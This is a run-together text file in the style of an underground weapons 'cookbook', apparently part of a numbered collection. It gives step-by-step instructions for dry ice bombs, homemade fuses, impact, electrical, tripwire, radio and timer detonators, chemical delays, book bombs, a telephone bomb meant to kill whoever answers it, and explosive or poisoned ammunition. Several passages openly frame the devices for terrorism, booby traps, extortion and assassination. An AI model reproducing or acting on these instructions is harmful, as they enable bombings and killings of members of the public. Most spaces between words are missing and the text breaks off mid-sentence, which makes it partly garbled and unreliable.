USESFORDRYICE TimeBombs: 1. Getasmallplasticcontainerwithlid(weusedthesmallplasticcans thatholdthecoastersusedforlargeformatPolaroidfilm).Afilmcanister wouldprobablywork;thekeyis,itshouldsealtightlyandtakeafairamount ofefforttoopen).Placeachunkofdryiceinthecan,putonthelidwithout quitesealingit.Puttheassembledbombinyourpocket,orbehindyourback. Approachthemarkandengageinnormalconversation.Whenhisattentionisdrawn away,quicklysealthelidonthebomb,deposititsomewherewithinafewfeet ofthemark,outofobvioussight,thenleave.Dependingonvariables(you'll wanttoexperimentfirst),you'llhearaloud"pop"andanevenlouder "Aarrgghhh!"withinaminute,whentheCOpressurebecomessufficienttoblow offthelid.Inaclutteredlab,thisisdoublynastybecausethemarkwill probablyneverfigureoutwhatmadethenoise. 2. Put23inchesofwaterina2literplasticpopbottle.Putinasmany chunksofdryiceaspossiblebeforethesmokegetstoothick.Screwonthecap, placeinanappropriatearea,andrunlikehell.Afteraboutaminute(your mileagemayvary),ahugeexplosionwillresult,sprayingwatereverywhere, alongwithwhat'sleftofthe2literbottle. MorethingstodowithDryIce: Hasanyoneeverthrowndryiceintoapublicpool?Aslongasyouchuckitinto thebottomofthedeepend,it'ssafe,andit'sreallyimpressiveifthewater iswarmenough "Funstuff.ItSCREAMSwhenitcomesintocontactwithmetal..." "Youcansafelyholdasmallpieceofdryiceinyourmouthifyou KEEPITMOVINGCONSTANTLY.Itlookslikeyou'resmokingoronfire." Editor'sNote:Dryicecanbealotoffun,butbeforewarned: Usinganythingbutplastictocontaindryicebombsissuicidal.Dryiceismore dangerousthanTNT,becauseit'sextremelyunpredictable.Evena2literbottle canproducesomenastyshrapnel:Onesourcetellsmethathecausedanexplosion witha2literbottlethatdestroyedametalgarbagecan.Inaddition,itis rumoredthatseveralkidshavebeenkilledbyshardsofglassresultingfromthe useofaglassbottle.Forsomereason,dryicebombshavebecomeverypopular inthestateofUtah.Asaresult,dryicebombshavebeenclassifiedas infernaldevices,andpossessionisacriminaloffense. 205.Fuses/Ignitors/Delays byExodus

Therearemanywaystoigniteexplosivedevices.Thereistheclassic"lightthe fuse,throwthebomb,andrun"approach,andtherearesensitivemercury switches,andmanythingsinbetween.Generally,electricaldetonationsystems aresaferthanfuses,buttherearetimeswhenfusesaremoreappropriatethan electricalsystems;itisdifficulttocarryanelectricaldetonationsystem intoastadium,forinstance,withoutbeingcaught.Adevicewithafuseor impactdetonatingfuzewouldbeeasiertohide. FUSEIGNITION Theoldestformofexplosiveignition,fusesareperhapsthefavoritetypeof simpleignitionsystem.Bysimplyplacingapieceofwaterprooffuseina device,onecanhavealmostguaranteedignition.Modernwaterprooffuseis extremelyreliable,burningatarateofabout2secondstotheinch.Itis availableasmodelrocketryfuseinmosthobbyshops,andcostsabout$3.00for aninefootlength.CannonFuseisapopularignitionsystemforpipebombers

becauseofitssimplicity.Allthatneedbedoneislightitwithamatchor lighter.Ofcourse,iftheArmyhadfuseslikethis,thenthegrenade,which usesfuseignition,wouldbeveryimpractical.Ifagrenadeignitionsystemcan beacquired,byallmeans,itisthemosteffective.But,sincesuchthingsdo notjustfloataround,thenextbestthingistoprepareafusesystemwhich doesnotrequiretheuseofamatchorlighter,butstillretainsits simplicity.Onesuchmethodisdescribedbelow: MATERIALS: StrikeonCovertypeMatches ElectricalTapeorDuctTape WaterproofFuse 1. Todeterminetheburnrateofaparticulartypeoffuse,simplymeasurea 6inchorlongerpieceoffuseandigniteit.Withastopwatch,pressthestart buttontheattheinstantwhenthefuselights,andstopthewatchwhenthefuse reachesitsend.Dividethetimeofburnbythelengthoffuse,andyouhave theburnrateofthefuse,insecondsperinch.Thiswillbeshownbelow: Supposeaneightinchpieceoffuseisburned,anditscompletetimeof combustionis20seconds. 20seconds/8inches=2secondsperinch. Ifadelayof10secondswasdesiredwiththisfuse,dividethedesired timebythenumberofsecondsperinch: 10seconds/2secondsperinch=4inches NOTE:THELENGTHOFFUSEHEREMEANSLENGTHOFFUSETOTHEPOWDER.SOME FUSE,ATLEASTANINCH,SHOULDBEINSIDETHEDEVICE.ALWAYSADDTHISEXTRAINCH, ANDPUTTHISEXTRAINCHANINCHINTOTHEDEVICE!!! 2. Afterdecidinghowlongadelayisdesiredbeforetheexplosivedeviceis togooff,addaboutaninchtothepremeasuredamountoffuse,andcutit off. 3. Carefullyremovethecardboardmatchesfromthepapermatchcase.Donot pulloffindividualmatches;keepallthematchesattachedtothecardboard base.Takeoneofthecardboardmatchsections,andleavetheotheronetomake asecondigniter. 4. Wrapthematchesaroundtheendofthefuse,withtheheadsofthematches touchingtheveryendofthefuse.Tapethemtheresecurely,makingsurenotto puttapeoverthematchheads.Makesuretheyareverysecurebypullingonthem atthebaseoftheassembly.Theyshouldnotbeabletomove. 5. Wrapthecoverofthematchesaroundthematchesattachedtothefuse, makingsurethatthestrikerpaperisbelowthematchheadsandthestriker facesthematchheads.Tapethepapersothatisfairlytightaroundthe matches.Donottapethecoverofthestrikertothefuseortothematches. Leaveenoughofthematchbooktopullonforignition. _____________________ \/ \/matchbookcover \/ |M|f|M|matchhead |A|u|A| |T|s|T| |C|e|C|

|tapeH|.|Htape| ||f|| |#####|u|#####|strikingpaper |#####|s|#####| \|e|/ \|.|/ \|f|/ \|u|/ |ta|s|pe| |ta|e|pe| |.| |.| |_| Thematchbookiswrappedaroundthematches,andistapedtoitself.The matchesaretapedtothefuse.Thestrikerwillrubagainstthematcheadswhen thematchbookispulled. 6. Whenreadytouse,simplypullonthematchpaper.Itshouldpullthe strikingpaperacrossthematchheadswithenoughfrictiontolightthem.In turn,theburningmatcheadswilllightthefuse,sinceitadjacenttothe burningmatchheads. HOWTOMAKEBLACKMATCHFUSE: Takeaflatpieceofplasticormetal(brassoraluminumareeasytoworkwith andwon'trust).Drilla1/16thinchholethroughit.Thisisyourdiefor sizingthefuse.Youcanmakefusesasbigasyouwant,butthisistheright sizeforthepipebombIwillbegettingtolater. Toaboutcupofblackpowderaddwatertomakeathinpaste.Addteaspoonof cornstarch.Cutsomeonefootlengthsofcottonthread.Usecotton,notsilkor threadmadefromsyntheticfibers.Putthesetogetheruntilyouhaveathickness thatfillstheholeinthediebutcanbedrawnthroughveryeasily. Tieyourbundleofthreadstogetheratoneend.Separatethethreadsandhold thebundleovertheblackpowdermixture.Lowerthethreadswithacircular motionsotheystartcurlingontothemixture.Pressthemunderwiththebackof ateaspoonandcontinueloweringthemsotheycoilintothepaste.Taketheend youareholdingandthreaditthroughthedie.Pullitthroughsmoothlyinone longmotion. Todryyourfuse,layitonapieceofaluminumfoilandbakeitinyour250 ovenortieittoagrillintheovenandletithangdown.Thefusemustbe bakedtomakeitstiffenoughfortheusesitwillbeputtolater.Airdrying willnotdothejob.IfyouusedSodiumNitrate,itwillnotevendrycompletely atroomtemperatures. Cutthedryfusewithscissorsinto2inchlengthsandstoreinanairtight container.Handlethisfusecarefullytoavoidbreakingit.Youcanalsousea firecrackerfuseifyouhaveanyavailable.Thefusescanusuallybepulledout withoutbreaking.Togiveyourselfsomerunningtime,youwillbeextending thesefuses(blackmatchorfirecrackerfuse)withsulfuredwick. Finally,itispossibletomakearelativelyslowburningfuseinthehome.By dissolvingaboutoneteaspoonofblackpowderinabout1/4acupofboiling water,and,whileitisstillhot,soakinginitalongpieceofallcotton string,aslowburningfusecanbemade.Afterthesoakedstringdries,itmust thenbetiedtothefuseofanexplosivedevice.Sometimes,theendoftheslow burningfusethatmeetsthenormalfusehasachargeofblackpowderor gunpowderattheintersectionpointtoinsureignition,sincetheslowburning fusedoesnotburnataveryhightemperature.

Asimilartypeofslowfusecanbemadebytakingtheabovemixtureofboiling waterandblackpowderandpouringitonalongpieceoftoiletpaper.Thewet toiletpaperisthengentlytwistedupsothatitresemblesafirecrackerfuse, andisallowedtodry. HOWTOMAKESULFUREDWICK Useheavycottonstringabout1/8thinchindiameter.Youcanfindsomeata gardensupplyfortyingupyourtomatoes.Besureit'scotton.Youcantestit bylightingoneend.Itshouldcontinuetoburnafterthematchisremovedand whenblownoutwillhaveasmolderingcoalontheend.Putsomesulfurina smallcontainerlikeasmallpiepanandmeltitintheovenat250. Itwillmeltintoatransparentyellowliquid.Ifitstartsturningbrown,itis toohot.Coilaboutaonefootlengthofstringintoit.Themeltedsulfurwill soakinquickly.Whensaturated,pullitoutandtieituptocoolandharden. Itcanbecuttodesiredlengthswithscissors.2inchesisaboutright.These wickswillburnslowlywithablueflameanddonotblowouteasilyina moderatewind.Theywillnotburnthroughaholeinametalpipe,butaregreat forextendingyourotherfuse.Theywillnotthrowoffsparks.Blackmatch generatessparkswhichcanigniteitalongitslengthcausingunpredictable burningtimes. IMPACTIGNITION Impactignitionisanexcellentmethodofignitionforspontaneousterrorist activities.Theproblemwithanimpactdetonatingdeviceisthatitmustbekept inaverysafecontainersothatitwillnotexplodewhilebeingtransportedto theplacewhereitistobeused.Thiscanbedonebyhavingaremovableimpact initiator. Thebestandmostreliableimpactinitiatorisonethatusesfactorymade initiatorsorprimers.ANo.11capforblackpowderfirearmsisonesuch primer.Theyusuallycomeinboxesof100,andcostabout$20.Tousesucha cap,however,oneneedsanipplethatitwillfiton.Blackpowdernipplesare alsoavailableingunstores.Allthatapersonhastodoisaskforapackage ofnipplesandthecapsthatfitthem.Nippleshaveaholethatgoesallthe waythroughthem,andtheyhaveathreadedend,andanendtoputthecapon.A cutawayofanippleisshownbelow: ________________ || _|| |||/\/\/\/\/\/\/\/\| _______||^^^^^^^| |___________| || No.11|_______| percussion_______Threadsforscrewing cap: here|__________nippleontobomb |____| ||^^^^^^^^^| |_||/\/\/\/\/\/\/\/\/| || |_________________| Whenmakingusingthistypeofinitiator,aholemustbedrilledintowhatever containerisusedtomakethebomboutof.Thenippleisthenscrewedintothe holesothatitfitstightly.Then,thecapcanbecarriedandplacedonthe bombwhenitistobethrown.Thecapshouldbebentasmallamountbeforeitis placedonthenipple,tomakesurethatitstaysinplace.Theonlyother

probleminvolvedwithanimpactdetonatingbombisthatitmuststrikeahard surfaceonthenippletosetitoff.Byattachingfinsorasmallparachuteon theendofthebomboppositetheprimer,thebomb,whenthrown,shouldstrike thegroundontheprimer,andexplode.Ofcourse,abombwithmercuryfulminate ineachendwillgooffonimpactregardlessofwhichenditstrikeson,but mercuryfulminateisalsolikelytogooffifthepersoncarryingthebombis bumpedhard. MAGICUBEIGNITOR AVERYSENSITIVEandreliableimpactinitiatorcanbeproducedfromthecommon MAGICUBE($2.40for12)typeflashbulbs.Simplycracktheplasticcoveroff, removethereflector,andyouwillsee4bulbs,eachofwhichhasasmallmetal rodholdingitinplace. CAREFULLYgraspthisrodwithapairofneedlenosepliers,andprygently upwards,makingsurethatNOFORCEISAPPLIEDTOTHEGLASSBULB. Eachbulbiscoatedwithplastic,whichmustberemovedforthemtobeeffective inourapplication.Thiscoatingcanberemovedbysoakingthebulbsinasmall glassofacetonefor3045minutes,atwhichpointtheplasticcanbeeasily peeledaway. Thebestmethodtousetheseistodissolvesomenitrocellulosebasedsmokeless powderinacetoneand/orether,formingathickgluelikepaste.Coattheendof thefusewiththispaste,thenstickthebulb(withthemetalrodfacingout) intothepaste.Abouthalfthebulbshouldbecompletelycovered,andifaVERY THINlayerofnitrocelluloseiscoatedovertheremainderthenignitionshould beveryreliable. Toinsurethatthedevicelandswiththebulbdown,asmallstreamercanbe attachedtotheoppositeside,sowhenitistossedhighintotheairthe appropriateendwillhitthegroundfirst. ELECTRICALIGNITION Electricalignitionsystemsfordetonationareusuallythesafestandmost reliableformofignition.Electricalsystemsareidealfordemolitionwork,if onedoesn'thavetoworrysomuchaboutbeingcaught.Withtwospoolsof500ft ofwireandacarbattery,onecandetonateexplosivesfroma"safe", comfortabledistance,andbesurethatthereisnobodyaroundthatcouldget hurt.Withanelectricalsystem,onecancontrolexactlywhattimeadevicewill explode,withinfractionsofasecond.Detonationcanbeabortedinlessthana second'swarning,ifapersonsuddenlywalksbythedetonationsight,orifa policecarchoosestorollbyatthetime.Thetwobestelectricalignitersare militarysquibsandmodelrocketryigniters.Blastingcapsforconstructionalso workwell.Modelrocketryignitersaresoldinpackagesofsix,andcostabout $1.00perpack.Allthatneedbedonetousethemisconnectittotwowiresand runacurrentthroughthem.Militarysquibsaredifficulttoget,buttheyarea littlebitbetter,sincetheyexplodewhenacurrentisrunthroughthem, whereasrocketryignitersonlyburstintoflame.MostsquibswillNOTdetonate KClO3/petroleumjellyorRDX.Thisrequiresablastingcaptypedetonationin mostcases.Thereare,however,militaryexplosivesquibswhichwilldothejob. Igniterscanbeusedtosetoffblackpowder,mercuryfulminate,orguncotton, whichinturn,cansetofahighorderexplosive. HOWTOMAKEANELECTRICFUZE ByCapt.Hack&GW Takeaflashlightbulbandplaceitglasstipdownonafile.Grinditdownon thefileuntilthereisaholeintheend.Solderonewiretothecaseofthe bulbandanothertothecenterconductorattheend.Fillthebulbwithblack powderorpowderedmatchhead.Oneortwoflashlightbatterieswillheatthe filamentinthebulbcausingthepowdertoignite.

ANOTHERELECTRICFUZE Takeamediumgradeofsteelwoolandpullastrandoutofit.Attachittothe endsoftwopiecesofcopperwirebywrappingitaroundafewturnsandthen pinchonasmallpieceofsoldertobindthestrandtothewire.Youwantabout inchofsteelstrandbetweenthewires.Number18or20isagoodsizewireto use. Cutaby1inchpieceofcardboardofthetypeusedinmatchcovers.Placea smallpileofpowderedmatchheadinthecenterandpressitflat.Placethe wiressothesteelstrandisontopofandincontactwiththepowder.Sprinkle onmorepowdertocoverthestrand. Thestrandshouldbesurroundedwithpowderandnottouchinganythingelse exceptthewiresatitsends.Placeapieceofblackmatchincontactwiththe powder.Nowputapieceofmaskingtapeontopofthelot,andfolditunderon thetwoends.Pressitdownsoitsticksallaroundthepowder.Thewiresare stickingoutononesideandtheblackmatchontheother. Asingleflashlightbatterywillsetthisoff. ELECTROMECHANICALIGNITION Electromechanicalignitionsystemsaresystemsthatusesometypeofmechanical switchtosetoffanexplosivechargeelectrically.Thistypeofswitchis typicallyusedinboobytrapsorotherdevicesinwhichthepersonwhoplaces thebombdoesnotwishtobeanywherenearthedevicewhenitexplodes.Several typesofelectromechanicaldetonatorswillbediscussed MercurySwitches Mercuryswitchesareaswitchthatusesthefactthatmercurymetalconducts electricity,asdoallmetals,butmercurymetalisaliquidatroom temperatures.Atypicalmercuryswitchisasealedglasstubewithtwo electrodesandabeadofmercurymetal.Itissealedbecauseofmercury'snasty habitofgivingoffbraindamagingvapors.Thediagrambelowmayhelptoexplain amercuryswitch. ______________ A/\B _____wire+______/_________\ \(Hg)|/ \_(_Hg___)|___/ | | wire| | | Whenthedropofmercury("Hg"ismercury'satomicsymbol)touchesboth contacts,currentflowsthroughtheswitch.Ifthisparticularswitchwasin itspresentposition,AB,currentwouldbeflowing,sincethemercurycan touchbothcontactsinthehorizontalposition. If,however,itwasinthe|position,thedropofmercurywouldonlytouchthe +contactontheAside.Current,thencouldn'tflow,sincemercurydoesnot reachbothcontactswhentheswitchisintheverticalposition.Thistypeof switchisidealtoplacebyadoor.Ifitwereplacedinthepathofaswinging doorintheverticalposition,themotionofthedoorwouldknocktheswitch down,ifitwasheldtothegroundbyapieceiftape.Thiswouldtiltthe switchintotheverticalposition,causingthemercurytotouchbothcontacts, allowingcurrenttoflowthroughthemercury,andtotheigniterorsquibinan explosivedevice. TripwireSwitches Atripwireisanelementoftheclassicboobytrap.Byplacinganearly

invisiblelineofstringorfishinglineintheprobablepathofavictim,and byputtingsometypeoftraptherealso,nastythingscanbecausedtooccur.If thismodeofthoughtisappliedtoexplosives,howwouldoneusesuchatripwire todetonateabomb.Thetechniqueissimple.Bywrappingthetipsofastandard clothespinwithaluminumfoil,andplacingsomethingbetweenthem,and connectingwirestoeachaluminumfoilcontact,anelectrictripwirecanbe made,Ifapieceofwoodattachedtothetripwirewasplacedbetweenthe contactsontheclothespin,theclothespinwouldserveasaswitch.Whenthe tripwirewaspulled,theclothespinwouldsnaptogether,allowingcurrentto flowbetweenthetwopiecesofaluminumfoil,therebycompletingacircuit, whichwouldhavetheigniterorsquibinit.Currentwouldflowbetweenthe contactstotheigniterorsquib,heattheigniterorsquib,causingitto explode.Makesurethatthealuminumfoilcontactsdonottouchthespring, sincethespringalsoconductselectricity. RadioControlDetonators Inthemovies,everyterroristorcriminalusesaradiocontrolleddetonatorto setoffexplosives.Withagoodradiodetonator,onecanbeseveralmilesaway fromthedevice,andstillcontrolexactlywhenitexplodes,inmuchthesame wayasanelectricalswitch.Theproblemwithradiodetonatorsisthattheyare rathercostly.However,therecouldpossiblybeareasonthataterroristwould wishtospendtheamountsofmoneyinvolvedwithaRC(radiocontrol)systemand useitasadetonator.IfsuchanindividualwantedtodeviseanRCdetonator, allhewouldneedtodoisvisitthelocalhobbystoreortoystore,andbuya radiocontrolledtoy.Takingitbacktohis/herabode,allthathe/shewould havetodoisdetachthesolenoid/motorthatcontrolsthemotionofthefront wheelsofaRCcar,ordetachthesolenoid/motoroftheelevators/rudderofaRC plane,ortherudderofaRCboat,andreconnectthesquiborrocketengine ignitertothecontactsforthesolenoid/motor.Thedeviceshouldbetested severaltimeswithsquibsorigniters,andfullychargedbatteriesshouldbein bothhecontrollerandthereceiver(thepartthatusedtomovepartsbeforethe devicebecameadetonator). DELAYS Adelayisadevicewhichcausestimetopassfromwhenadeviceissetupto thetimethatitexplodes.Aregularfuseisadelay,butitwouldcostquitea bittohavea24hourdelaywithafuse.Thissectiondealswiththedifferent typesofdelaysthatcanbeemployedbyaterroristwhowishestobesurethat hisbombwillgooff,butwantstobeoutofthecountrywhenitdoes. FUSEDELAYS Itisextremelysimpletodelayexplosivedevicesthatemployfusesfor ignition.Perhapsthesimplestwaytodosoiswithacigarette.Anaverage cigaretteburnsforbetween811minutes.Thehigherthe"tar"andnicotine rating,theslowerthecigaretteburns.Low"tar"andnicotinecigarettesburn quickerthanthehigher"tar"andnicotinecigarettes,buttheyarealsoless likelytogooutifleftunattended,i.e.notsmoked.Dependingonthewindor draftinagivenplace,ahigh"tar"cigaretteisbetterfordelayingthe ignitionofafuse,buttheremustbeenoughwindordrafttogivethecigarette enoughoxygentoburn.Peoplewhousecigarettesforthepurposeofdelaying fuseswilloftentestthecigarettesthattheyplantouseinadvancetomake suretheystaylitandtoseehowlongitwillburn.Onceacigarettesburnrate isdetermined,itisasimplematterofcarefullyputtingaholealltheway throughacigarettewithatoothpickatthepointdesired,andpushingthefuse foradeviceintheholeformed. |=| |=|filter |=| || || |o|holeforfuse

cigarette|| || || || || || || || || |_|lightthisend TIMERDELAYS Timerdelays,or"timebombs"areusuallyemployedbyanindividualwhowishes tothreatenaplacewithabombanddemandmoneytorevealitslocationand meanstodisarmit.Suchadevicecouldbeplacedinanypopulatedplaceifit wereconcealedproperly.Thereareseveralwaystobuildatimerdelay.By simplyusingascrewasonecontactatthetimethatdetonationisdesired,and usingthehourhandofaclockastheothercontact,asimpletimercanbemade. Theminutehandofaclockshouldberemoved,unlessadelayoflessthanan hourisdesired. Themaindisadvantagewiththistypeoftimeristhatitcanonlybesetfora maximumtimeof12hours.Ifanelectronictimerisused,suchasthatinan electronicclock,thendelaysofupto24hoursarepossible.Byremovingthe speakerfromanelectronicclock,andattachingthewiresofasquiborigniter tothem,atimerwithadelayofupto24hourscanbemade.Allthatonehasto doissetthealarmtimeoftheclocktothedesiredtime,connecttheleads, andgoaway.Thiscouldalsobedonewithanelectronicwatch,ifalarger batterywereused,andthecurrenttothespeakerofthewatchwassteppedup viaatransformer.Thiswouldbegood,sincesuchatimercouldbeextremely small. ThetimerinaVCR(VideoCassetteRecorder)wouldbeideal.VCR'scanusually besetfortimesofuptoaweek.Theleadsfromthetimertotherecording equipmentwouldbetheonesthatanigniterorsquibwouldbeconnectedto. Also,onecanbuytimersfromelectronicsstoresthatwouldbeworkwell. Finally,onecouldemployadigitalwatch,andusearelay,orelectromagnetic switchtofiretheigniter,andthecurrentofthewatchwouldnothavetobe steppedup. CHEMICALDELAYS Chemicaldelaysareuncommon,buttheycanbeextremelyeffectiveinsomecases. ThesewereoftenusedinthebombstheGermansdroppedonEngland.Thedelay wouldensurethatabombwoulddetonatehoursorevendaysaftertheinitial bombingraid,therebyincreasingtheterrifyingeffectontheBritishcitizenry. Ifaglasscontainerisfilledwithconcentratedsulfuricacid,andcappedwith severalthicknessesofaluminumfoil,oracapthatitwilleatthrough,thenit canbeusedasadelay.Sulfuricacidwillreactwithaluminumfoiltoproduce aluminumsulfateandhydrogengas,andsothecontainermustbeopentotheair ononeendsothatthepressureofthehydrogengasthatisformingdoesnot breakthecontainer. __ |||| |||| |||| ||_____________|| |||| ||sulfuric|| |||| ||acid||

||||aluminumfoil ||_____________||(severalthicknesses) |_________________| Thealuminumfoilisplacedoverthebottomofthecontainerandsecuredthere withtape.Whentheacideatsthroughthealuminumfoil,itcanbeusedto igniteanexplosivedeviceinseveralways. 1. Sulfuricacidisagoodconductorofelectricity.Iftheacidthateats throughthefoiliscollectedinaglasscontainerplacedunderneaththefoil, andtwowiresareplacedintheglasscontainer,acurrentwillbeabletoflow throughtheacidwhenbothofthewiresareimmersedintheacid. 2. Sulfuricacidreactsveryviolentlywithpotassiumchlorate.Iftheacid dripsdownintoacontainercontainingpotassiumchlorate,thepotassium chloratewillburstintoflame.Thisflamecanbeusedtoigniteafuse,orthe potassiumchloratecanbetheigniterforathermitebomb,ifsomepotassium chlorateismixedina50/50ratiowiththethermite,andthismixtureisused asanigniterfortherestofthethermite. 3. Sulfuricacidreactswithpotassiumpermanganateinasimilarway. 206.FilmCanistersII byBill

Forarelativelylowshrapnelexplosion,Isuggestpouringitintoanempty35mm filmcanister.Pokeaholeintheplasticlidforafuse.Thesegoodiesmakean explosionaudibleamileawayeasily. 1. 2. 3. 4. 5. 6. Poketheholebeforeputtingtheflashpowderintothecanister. Don'tgetanypowderonthelipofthecanister. Onlyuseaverysmallquantityandworkyourwayuptothedesiredresult. Donotpackthepowder,itworksbestloose. Donotgrindorrubthemixtureitisfrictionsensitive. Usealongfuse. byExodus

207.BookBombs

Concealingabombcanbeextremelydifficultinadayandagewhereperpetrators ofviolencerunwild.Bagsandbriefcasesareoftensearchedbyauthorities wheneveroneentersaplacewhereanindividualmightintendtosetoffabomb. Oneapproachtodisguisingabombistobuildwhatiscalledabookbomb;an explosivedevicethatisentirelycontainedinsideofabook. Usually,arelativelylargebookisrequired,andthebookmustbeofthe hardbackvarietytohideanyprotrusionsofabomb.Dictionaries,lawbooks, largetextbooks,andothersuchbooksworkwell.Whenanindividualmakesa bookbomb,he/shemustchooseatypeofbookthatisappropriatefortheplace wherethebookbombwillbeplaced.Theactualconstructionofabookbombcan bedonebyanyonewhopossessesanelectricdrillandacopingsaw.First,all ofthepagesofthebookmustbegluedtogether.Bypouringanentirecontainer ofwatersolubleglueintoalargebucket,andfillingthebucketwithboiling water,agluewatersolutioncanbemadethatwillholdallofthebook'spages togethertightly.Afterthegluewatersolutionhascooledtoabearable temperature,andthesolutionhasbeenstirredwell,thepagesofthebookmust beimmersedinthegluewatersolution,andeachpagemustbethoroughlysoaked. Itisextremelyimportantthatthecoversofthebookdonotgetstucktothe pagesofthebookwhilethepagesaredrying.Suspendingthebookbybothcovers andclampingthepagestogetherinaviseworksbest.Whenthepagesdry,after

aboutthreedaystoaweek,aholemustbedrilledintothenowrigidpages,and theyshoulddrilloutmuchlikewood.Then,byinsertingthecopingsawblade throughthepagesandsawingoutarectanglefromthemiddleofthebook,the individualwillbeleftwithashellofthebook'spages.Thepages,when drilledout,shouldlooklikethis: ________________________ |____________________| |||| |||| |||| |||| |||| |||| |||| |||| |||| |||| |||| ||__________________|| |______________________| (Bookcoversomitted) Thisrectanglemustbesecurelygluedtothebackcoverofthebook.After buildinghis/herbomb,whichusuallyisofthetimerorradiocontrolled variety,thebomberplacesitinsidethebook.Thebombitself,andwhatever timerordetonatorisused,shouldbepackedinfoamtopreventitfromrolling orshiftingabout.Finally,afterthetimerisset,ortheradiocontrolhas beenturnedon,thefrontcoverisgluedclosed,andthebombistakentoits destination. 208.PhoneBombs byExodus

Thephonebombisanexplosivedevicethathasbeenusedinthepasttokillor injureaspecificindividual.Thebasicideaissimple:whenthepersonanswers thephone,thebombexplodes.Ifasmallbutpowerfulhighexplosivedevicewith asquibwasplacedinthephonereceiver,whenthecurrentflowedthroughthe receiver,thesquibwouldexplode,detonatingthehighexplosiveintheperson's hand.Nasty.Allthathastobedoneisacquireasquib,andtapethereceiver switchdown. Unscrewthemouthpiececover,andremovethespeaker,andconnectthesquib's leadswhereitwas.Placeahighexplosiveputty,suchasC1inthereceiver, andscrewthecoveron,makingsurethatthesquibissurroundedbytheC1. Hangthephoneup,andleavethetapeinplace. Whentheindividualtowhomthephonebelongsattemptstoanswerthephone,he willnoticethetape,andremoveit.Thiswillallowcurrenttoflowthroughthe squib.Notethatthedevicewillnotexplodebymerelymakingaphonecall;the ownerofthephonemustliftupthereceiver,andremovethetape.Itishighly probablethatthephonewillbebyhis/herearwhenthedeviceexplodes... IMPROVEDPHONEBOMB Theaboveseemsoverlycomplicatedtome...itwouldbebettertorigthedevice asfollows: FIRSTUNPLUGTHEPHONEFROMTHEWALL.WirethedetonatorINLINEwiththewires goingtotheearpiece,(mayneedtowireitwitharelaysothedetonatorcan receivethefulllinepower,notjusttheaudiopowertotheearpiece)

PackC4intothephonebody(NOTthehandset)andplugitbackin.Whenthey pickupthephone,powerwillflowthroughthecircuittothedetonator.... ________ /||\ ~||~ @@@@@@@@ @@@@@@@@@@ @@@@@@@@@@ 209.SPECIALAMMUNITION byExodus

SPECIALAMMUNITIONFORBLOWGUNS Theblowgunisaninterestingweaponwhichhasseveraladvantages.Ablowguncan beextremelyaccurate,concealable,anddeliveranexplosiveorpoisoned projectile.Themanufactureofanexplosivedartorprojectileisnotdifficult. Toacquireablowgun,pleasecontacttheeditoratoneoftheaddressesgivenin theintroduction. Perhapsthemostsimpledesignforsuchinvolvestheuseofapillcapsule,such asthekindthataretakenforheadachesorallergies.Emptygelatinpill capsulescanbepurchasedfrommosthealthfoodstores.Next,thecapsulewould befilledwithanimpactsensitiveexplosive,suchasmercuryfulminate.An additionalhighexplosivechargecouldbeplacedbehindtheimpactsensitive explosive,ifoneofthelargercapsuleswereused. Finally,theexplosivecapsulewouldberegluedbacktogether,andatasselor cottonwouldbegluedtotheendcontainingthehighexplosive,toinsurethat theimpactdetonatingexplosivestruckthetargetfirst. Suchadevicewouldprobablybeabout3/4ofaninchlong,notincludingthe tasselorcotton,andlooksomethinglikethis: ____________________ /mercury|\ (fulminate|R.D.X.)}tassels \________|___________/ Caremustbetakenifapowerfuldartwentoffintheblowgun,youcouldeasily blowthebackofyourheadoff. SPECIALAMMUNITIONFORWRISTROCKETSANDSLINGSHOTS Amodernwristrocketisaformidableweapon.Itcanthrowashootermarbleabout 500ft.withreasonableaccuracy.Insideof200ft.,itcouldwellbelethalto amanoranimal,ifitstruckinavitalarea.Becauseoftherelativelylarge sizedprojectilethatcanbeusedinawristrocket,thewristrocketcanbe adaptedtothrowrelativelypowerfulexplosiveprojectiles. Asmallsegmentofaluminumpipecouldbemadeintoanimpactdetonatingdevice byfillingitwithanimpactsensitiveexplosivematerial. Also,suchapipecouldbefilledwithaloworderexplosive,andfittedwitha fuse,whichwouldbelitbeforethedevicewasshot.Onewouldhavetomakesure thatthefusewasofsufficientlengthtoinsurethatthedevicedidnotexplode beforeitreacheditsintendedtarget. Finally,.22calibercaps,suchasthekindthatareusedin.22caliberblank guns,makeexcellentexplodingammunitionforwristrockets,buttheymustbe usedatarelativelycloserange,becauseoftheirlightweight. SPECIALAMMUNITIONFORFIREARMS Whenspecialammunitionisusedincombinationwiththepowerandrapidityof

modernfirearms,itbecomesveryeasytotakeonasmallarmywithasingle weapon.Itispossibletobuyexplosiveammunition,butthatcanbedifficultto do.Suchammunitioncanalsobemanufacturedinthehome.Thereis,however,a riskinvolvedwithmodifyinganyammunition.Iftheammunitionismodified incorrectly,insuchawaythatitmakesthebulleteventheslightestbit wider,anexplosioninthebarreloftheweaponwilloccur.Forthisreason, NOBODYSHOULDEVERATTEMPTTOMANUFACTURESUCHAMMUNITION. SPECIALAMMUNITIONFORHANDGUNS Ifanindividualwishedtoproduceexplosiveammunitionforhis/herhandgun, he/shecoulddoit,providedthatthepersonhadanimpactsensitiveexplosive andafewsimpletools.Onewouldfirstpurchaseallleadbullets,andthenmake oracquireanimpactdetonatingexplosive.Bydrillingaholeinaleadbullet withadrill,aspacecouldbecreatedfortheplacementofanexplosive.After fillingtheholewithanexplosive,itwouldbesealedinthebulletwithadrop ofhotwaxfromacandle.Adiagramofacompletedexplodingbulletisshown below. _o_dropofwax /|*|\ ||*||impactsensitiveexplosive ||_|| |_____| Thishollowspacedesignalsoworksforputtingpoisoninbullets. Inmanyspythrillers,anassassinisdepictedasmanufacturing"exploding bullets"byplacingadropofmercuryinthenoseofabullet.Through experimentationithasbeenfoundthatthiswillnotwork.Mercuryreactswith leadtoformainertsilverycompound. SPECIALAMMUNITIONFORSHOTGUNS Becauseoftheirlargeboreandhighpower,itispossibletocreatesome extremelypowerfulspecialammunitionforuseinshotguns.Ifashotgunshellis openedatthetop,andtheshotremoved,theshellcanbereclosed.Then,if onecanfindaverysmooth,lightweightwoodendowelthatisclosetothebore widthoftheshotgun,apersoncanmakeseveraltypesofshotgunlaunched weapons. Insertthedowelinthebarreloftheshotgunwiththeshellwithouttheshotin thefiringchamber.Markthedowelaboutsixinchesawayfromtheendofthe barrel,andremoveitfromthebarrel. Next,decidewhattypeofexplosiveorincendiarydeviceistobeused.This devicecanbeachemicalfirebottle,apipebomb,orathermitebomb.Afterthe deviceismade,itmustbesecurelyattachedtothedowel.Whenthisisdone, 